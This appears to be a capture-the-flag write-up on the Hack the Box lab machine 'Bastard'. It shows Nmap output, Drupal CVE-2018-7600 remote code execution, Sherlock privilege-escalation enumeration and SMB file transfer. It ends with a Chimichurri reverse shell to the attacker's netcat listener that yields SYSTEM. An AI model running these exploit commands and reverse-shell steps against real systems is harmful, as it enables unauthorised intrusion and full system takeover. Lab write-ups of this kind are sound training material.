Hack the Box Bastard
7 min readJun 3, 2020
My write-up on HTB’s retired machine “Bastard” that outlines manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
Starting with Nmap to determine open ports and services
nmap -sC -sV --script vuln 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 10:52 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.9
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.9:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.9:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.9:80/user/
| Form id: user-login
| Form action: /user/
|
| Path: http://10.10.10.9:80/user
| Form id: user-login
|_ Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /rss.xml: RSS or Atom feed
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect resultEnumeration
Further enumerating tcp/80
Searchsploit to identify possible exploits for Drupal 7.54
Tried several exploits including the 41564.php but stumble upon replaying cookies and session id. Further researching led me to “https://github.com/pimps/CVE-2018-7600”. Did not have to edit the python script and seems to do the trick .
root@cainta:~/Documents/htb/Bastard/CVE-2018-7600# python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-LOvQkOzsRz5QCAjBT2OrPr35lTi4nH8oXpYP1Bg4kNI
[*] Triggering exploit to execute: whoami
nt authority\iusr
Next step is to load powershell scripts and see if we can get reverse shell. I’ve used Nishang’s Invoke-PowerShellTcp.ps1 and executed reverse shell on port 4444.
Command below is the combination of the “CVE-2018–7600 remote code execution” by Pimps that I found in github with “Invoke-Powershelltcp.ps1”. Launch this command with a reverse shell that connects back on port 4444.
Initial Foothold
Initial foothold obtained and we have access to user.txt file.
Privilege Escalation
To determine how we can elevate our privilege, first we have to find a way to identity local vulnerabilities.
System Information
PS C:\temp> systeminfoHost Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ??
System Boot Time: 31/5/2020, 11:06:40 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.487 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.481 MB
Virtual Memory: In Use: 614 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Tried different windows exploit suggester tools by transferring it to the victim machine but could not get it to execute or it just hang. So I save the system info and transfer the systeminfo.txt to my Kali machine.
Setup smbserverroot@cainta:~/Documents/htb/Bastard# impacket-smbserver bugok /root/Documents/htb/Bastard/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.9,49252)
[*] AUTHENTICATE_MESSAGE (\,BASTARD)
[*] User BASTARD\ authenticated successfully
[*] :::00::4141414141414141
[-] Unknown level for query path info! 0x109From Bastard copy filePS C:\temp> copy //10.10.14.37/bugok/Sherlock.ps1 Sherlock.ps1
PS C:\temp> lsDirectory: C:\tempMode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 28/5/2020 4:48 ?? 16663 Sherlock.ps1PS C:\temp>
Now run ‘Sherlock.ps1’
PS C:\temp> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systemsTitle : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears VulnerableTitle : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not VulnerableTitle : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears VulnerableTitle : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not VulnerableTitle : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systemsTitle : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears VulnerableTitle : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not VulnerableTitle : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Not VulnerableTitle : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
Tried different local vulnerable exploits but could not seem to get them loaded. Further research led me to “Chimichurri.exe” https://github.com/Re4son/Chimichurri.
Root Flag Obtained
PS C:\inetpub\drupal-7.54> ./Chimichurri.exe "10.10.14.37 9999"
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\inetpub\drupal-7.54> ./Chimichurri.exe 10.10.14.37 9999Netcat Windowroot@cainta:~/Documents/htb/Bastard# nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.9] 49315
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\inetpub\drupal-7.54>whoami
whoami
nt authority\systemC:\inetpub\drupal-7.54>c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAADirectory of c:\Users\Administrator\Desktop19/03/2017 08:33 ▒▒ <DIR> .
19/03/2017 08:33 ▒▒ <DIR> ..
19/03/2017 08:34 ▒▒ 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.576.576 bytes freec:\Users\Administrator\Desktop>
Lessons Learned
- Understand how publicly available exploit works. Every systems behaves differently and you may need to compile differently for the target host.
- Learn other alternative to move / download files to the victim host if wget or curl commands are not available.
- Understand how to execute commands on a limited access powershell.
References
- https://github.com/pimps/CVE-2018-7600 for Drupal 7 CVE-2018–7600
- https://github.com/Re4son/Chimichurri for Windows Server 2008 R2 6.1.7600 N/A Build 7600 local exploit
